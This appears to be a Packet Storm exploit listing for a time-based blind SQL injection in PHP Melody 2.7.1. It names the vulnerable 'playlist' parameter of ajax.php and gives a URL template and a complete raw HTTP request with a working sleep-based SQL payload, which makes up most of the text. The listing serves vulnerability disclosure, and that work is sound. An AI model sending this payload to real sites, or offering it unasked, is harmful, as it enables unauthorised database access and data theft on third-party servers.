PHP Melody version 2.7.1 suffers from a remote SQL injection vulnerability.
02cf290ec1843345bce4cc3bb006a4a22f262d7321d1a3e904c769d5cd03eda0# Exploit Title: PHP Melody v2.7.1 - SQL Injection
# Date: 30/12/2017
# Exploit Author: Ahmad Mahfouz
# Contact: http://twitter.com/eln1x
# Vendor Homepage: http://www.phpsugar.com/ Buy http://www.phpsugar.com/phpmelody_order.html
# Version: 2.7.1
# Tested on: Mac OS
#
# SQL Injection Type: time-based blind
# Parameter: playlist
# Page: ajax.php
# URL: http://target.com/ajax.php?p=video&do=getplayer&vid=[VALID_VIDO_ID]&aid=1&player=detail&playlist=[SQLi]
GET /ajax.php?p=video&do=getplayer&vid=randomid&aid=1&player=detail&playlist='+(select*from(select(sleep(20)))a)+' HTTP/1.1
Host: localhost
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed